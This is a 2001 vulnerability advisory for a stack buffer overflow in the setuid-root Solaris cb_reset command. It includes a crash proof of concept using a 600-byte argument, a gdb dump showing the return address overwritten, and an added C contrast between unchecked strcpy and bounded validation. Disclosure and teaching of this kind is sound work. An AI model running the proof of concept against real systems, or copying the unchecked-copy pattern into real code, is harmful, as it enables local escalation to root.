Solaris /opt/SUNWssp/bin/cb_reset buffer overflow

Published: 2001-06-21
Updated: 2001-06-21
Severity: High
Threat level: Local administrator (root) privileges
Error type: Input validation error
Exploitation: Server mode

Affected systems
SunOS 5.8

Detailed description
The SUNWssp package in SunOS 5.8 (not installed by default) contains the setuid-root command cb_reset, which does not properly check user-supplied input. Passing an argument of more than 600 characters can corrupt the stack and overwrite the return address.

Test code
$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
$ ls /tftpboot/cb_port
/tftpboot/cb_port
$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)
$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.
[...]
Loaded symbols for /usr/lib/nss_files.so.1
#0  0x1219c in cb_send_frame ()
(gdb) info registers
g0             0x0        0
g1             0xff195b80 -15115392
g2             0xff322630 -13490640
g3             0xff332d78 -13423240
g4             0x0        0
g5             0x0        0
g6             0x0        0
g7             0x0        0
o0             0x13278    78456
o1             0xff1bbab8 -14959944
o2             0xff1b8018 -14974952
o3             0x13278    78456
o4             0x13258    78424
o5             0xffbedb71 -4269199
sp             0xffbedb18 -4269288
o7             0x1218c    74124
l0             0xc3c3c3c3 -1010580541
l1             0x41414141 1094795585
l2             0x41414141 1094795585
l3             0x41414141 1094795585
l4             0x41414141 1094795585
l5             0x41414141 1094795585
l6             0x41414141 1094795585
l7             0x41414141 1094795585
i0             0x41414141 1094795585
i1             0x41414141 1094795585
i2             0x41414141 1094795585
i3             0x41414141 1094795585
i4             0x4141414d 1094795597
i5             0x41414141 1094795585
fp             0x41414141 1094795585
i7             0x41414141 1094795585 (***)
y              0xb        11
psr            0xfe801001 -25161727
wim            0x0        0
tbr            0x0        0
pc             0x1219c    74140
npc            0x121a0    74144
fpsr           0x0        0
cpsr           0x0        0
(gdb)

Solution
None yet.

Related information
Pablo Sor psor@afip.gov.ar, psor@ccc.uba.ar
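The register dump above shows the saved frame pointer (fp) and return address (i7) replaced by 0x41414141, the classic signature of an unbounded copy of an argument into a fixed stack buffer. The following is an added illustration, not cb_reset's source (which is not on the page): the unchecked-copy pattern beside a bounded, validated version. The 256-byte buffer size and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define HOST_BUF 256   /* assumed fixed-size stack buffer; not from cb_reset */

/* Vulnerable pattern: an unbounded copy of a command-line argument into a
 * fixed stack buffer. An argument longer than the buffer overruns it into
 * the saved register window (on SPARC the %l/%i registers, including %fp
 * and the return address %i7), which is what the 0x41414141 values in the
 * gdb dump show. Shown for contrast only; do not call with long input. */
int reset_host_unchecked(const char *arg)
{
    char host[HOST_BUF];
    strcpy(host, arg);                  /* no length check */
    return (int)strlen(host);
}

/* Hardened pattern: reject input that is too long or that contains
 * characters a host name cannot contain, then copy with an explicit bound.
 * Returns 0 on success and -1 when the argument is rejected. */
int reset_host_checked(const char *arg, char *out, size_t outsz)
{
    size_t n = strlen(arg);
    if (n == 0 || n >= outsz)
        return -1;                      /* would not fit with its NUL */
    for (size_t i = 0; i < n; i++) {
        char c = arg[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '-' || c == '.';
        if (!ok)
            return -1;                  /* not a host-name character */
    }
    memcpy(out, arg, n + 1);            /* bounded copy including NUL */
    return 0;
}

/* Wrapper that owns the buffer, so callers only see accept/reject. */
int host_ok(const char *arg)
{
    char buf[HOST_BUF];
    return reset_host_checked(arg, buf, sizeof buf);
}

/* Reproduces the advisory's 600-byte input (constructed) against the
 * checked path; returns 1 when the input is rejected as expected. */
int long_input_rejected(void)
{
    char big[601];
    memset(big, 'A', 600);
    big[600] = '\0';
    return host_ok(big) == -1;
}
```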